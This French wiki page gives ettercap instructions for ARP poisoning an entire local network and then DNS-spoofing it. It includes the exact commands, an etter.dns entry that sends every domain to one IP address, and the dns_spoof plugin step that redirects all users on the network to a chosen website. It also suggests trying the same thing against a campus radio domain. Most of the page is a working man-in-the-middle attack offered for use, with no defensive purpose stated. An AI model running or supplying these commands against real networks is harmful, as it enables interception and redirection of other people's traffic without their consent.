======ARP Poisoning======

=====Ressources=====
  * [[https://fr.wikipedia.org/wiki/ARP_poisoning|ARP poisoning sur fr.wikipedia.org]]


=====Voici les commandes pour faire du ARP poisoning=====

  sudo ettercap -T -q -F '/usr/share/ettercap/testF.ef' -i eth0 -M ARP
  Ensuite tu appuies sur la touche 'p' et une liste plugin va s'afficher. De là tu entres le nom du plugin à activer et tu appuies sur la touche 'entrée'.
Exemple :

Pour que tout le monde voit une certaine page web, il faut éditer le fichier
  sudo nano /usr/share/ettercap/etter.dns
ou selon distrib
  sudo nano /etc/ettercap/etter.dns

Tu commentes toutes les lignes sauf une ou tu entres par exemple :
  *.* A 212.95.67.222
ou pour Radio campus TRyphon > serveur Labo Campus (à tester)
  *.tryphon.eu A 62.210.177.86

Ensuite :
  sudo ettercap -T -q -F '/usr/share/ettercap/testF.ef' -i eth0 -M ARP // //

puis touche 'p' et tu entres 'dns_spoof' puis touche 'entrée'

Et voilà, tout le réseau devrait être routé sur le site du Figaro

  * [[http://eatingsecurity.blogspot.fr/2011/02/using-ettercap-for-arp-poisoning.html|using ettercap for arp poisoning sur eatingsecurity.blogspot.fr]]
  * [[http://www.thegeekstuff.com/2012/05/ettercap-tutorial/|ettercap tutorial sur thegeekstuff.com]]

{{tag>bj securite}}